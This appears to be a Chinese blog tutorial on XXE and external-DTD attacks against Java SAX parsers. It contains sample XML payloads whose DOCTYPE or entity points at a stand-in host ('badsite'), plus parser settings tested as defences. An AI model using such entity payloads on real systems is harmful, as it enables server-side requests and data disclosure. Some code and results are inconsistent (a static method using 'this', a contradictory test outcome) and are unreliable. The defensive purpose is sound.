这篇文章主要介绍如何利用XML的DOCTYPE属性进行恶意攻击和如何防范这类的攻击。
场景1:在XML使用DTD
family.xml
<?xml version="1.0" standalone="no"?> <!DOCTYPE family SYSTEM "family.dtd"> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> </family>
family.dtd
<!ELEMENT family (member*)> <!ATTLIST family lastname CDATA #REQUIRED> <!ELEMENT member (#PCDATA)> <!ATTLIST member memberid ID #REQUIRED> <!ATTLIST member dad IDREF #IMPLIED> <!ATTLIST member mom IDREF #IMPLIED>
场景2:在一个XML中引用另一个XML
family.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY other SYSTEM "other.xml">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> &other; </family>
other.xml
<?xml version="1.0" encoding="UTF-8"?> <ok/>
Java解析代码示例:
public static void main(String[] arg) throws Exception { InputStream is = this.getClass().getResourceAsStream("family.xml"); DefaultHandler handler = new DefaultHandler(); SAXParserFactory f = SAXParserFactory.newInstance(); f.setNamespaceAware(false); SAXParser parser = f.newSAXParser(); parser.parse(is, handler); }
在解析场景1和2中的family.xml时,若相关的文件的路径都正确,那么解析不会出现任何问题。若是场景1中family.dtd或者是场景2中的other.xml不存在时,我们就会发现解析时会出现如下异常:
Exception in thread "main" java.io.FileNotFoundException: /somepath/xxx/family.dtd (The system cannot find the file specified) at java.io.FileInputStream.open(Native Method) at java.io.FileInputStream.<init>(FileInputStream.java:106) at java.io.FileInputStream.<init>(FileInputStream.java:66) at sun.net.www.protocol.file.FileURLConnection.connect(FileURLConnection.java:70) at sun.net.www.protocol.file.FileURLConnection.getInputStream(FileURLConnection.java:161) at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:653) at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1315) at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1252) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanEntityReference(XMLDocumentFragmentScannerImpl.java:1906) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl$FragmentContentDriver.next(XMLDocumentFragmentScannerImpl.java:3032) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:648) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(XMLDocumentFragmentScannerImpl.java:511) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:808) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:737) at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:119) at com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser.parse(AbstractSAXParser.java:1205) at com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl$JAXPSAXParser.parse(SAXParserImpl.java:522) at javax.xml.parsers.SAXParser.parse(SAXParser.java:395) at javax.xml.parsers.SAXParser.parse(SAXParser.java:198)
看到这个异常,你会想到什么?
在解析时它试图寻找family.dtd或者other.xml,那么我们是否可以用这个机制干点什么坏事?
再看下面2个xml片段:
场景1更新:将dtd的地址指向http://badsite/attack/attack.jsp
<?xml version="1.0" standalone="no"?> <!DOCTYPE family SYSTEM "http://badsite/attack/attack.jsp"> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> </family>
场景2更新:将other.xml指向http://badsite/attack/attack.jsp
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> &attack; </family>
如果我们在去解析这2个xml片段,就会发现它会去访问http://badsite/attack/attack.jsp这个地址。此时想必你已经知道下一步该怎么做了吧。
对于场景1,我们在解析xml时需要禁止加载额外的dtd和验证
f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); f.setFeature("http://xml.org/sax/features/validation", false);
验证标记默认是为False的。
对于场景2,目前我还没有找到比较好的方式,只能在解析式时禁止使用doctype定义——比较粗鲁了。
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
这种方式对场景1也是适用的。
对于场景1和2继续做了如下5组测试
组合1:
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> </family>
出现异常:
Exception in thread "main" java.lang.NullPointerException at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:685) at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:364) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1141) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1090) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$PrologDriver.next(XMLDocumentScannerImpl.java:977) at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:648) at com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl.scanDocument(XMLDocumentFragmentScannerImpl.java:511) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:808) at com.sun.org.apache.xerces.internal.parsers.XML11Configuration.parse(XML11Configuration.java:737) at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:119) at com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser.parse(AbstractSAXParser.java:1205) at com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl$JAXPSAXParser.parse(SAXParserImpl.java:522) at javax.xml.parsers.SAXParser.parse(SAXParser.java:395) at javax.xml.parsers.SAXParser.parse(SAXParser.java:198)
组合2:
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> </family>
则解析通过,且并未访问http://badsite/attack/attack.jsp恶意页面
组合3:
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> &attack; </family>
解析通过,但要求访问http://badsite/attack/attack.jsp,将返回结果写入到xml中
组合4:
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE family [<!ENTITY attack SYSTEM "http://badsite/attack/attack.jsp">]> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> &attack; </family>
解析失败,异常同组合1
组合5:
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
<?xml version="1.0" standalone="no"?> <!DOCTYPE family SYSTEM "http://badsite/attack/attack.jsp"> <family lastname="Smith"> <member memberid="m1">Sarah</member> <member memberid="m2">Bob</member> <member memberid="m3" mom="m1" dad="m2">Joanne</member> <member memberid="m4" mom="m1" dad="m2">Jim</member> </family>
无论设定 http://xml.org/sax/features/validation 与 http://apache.org/xml/features/nonvalidating/load-external-dtd 为True 或 False,解析都通过
综上:在解析xml时,忽略doctype定义是比较有效的方式。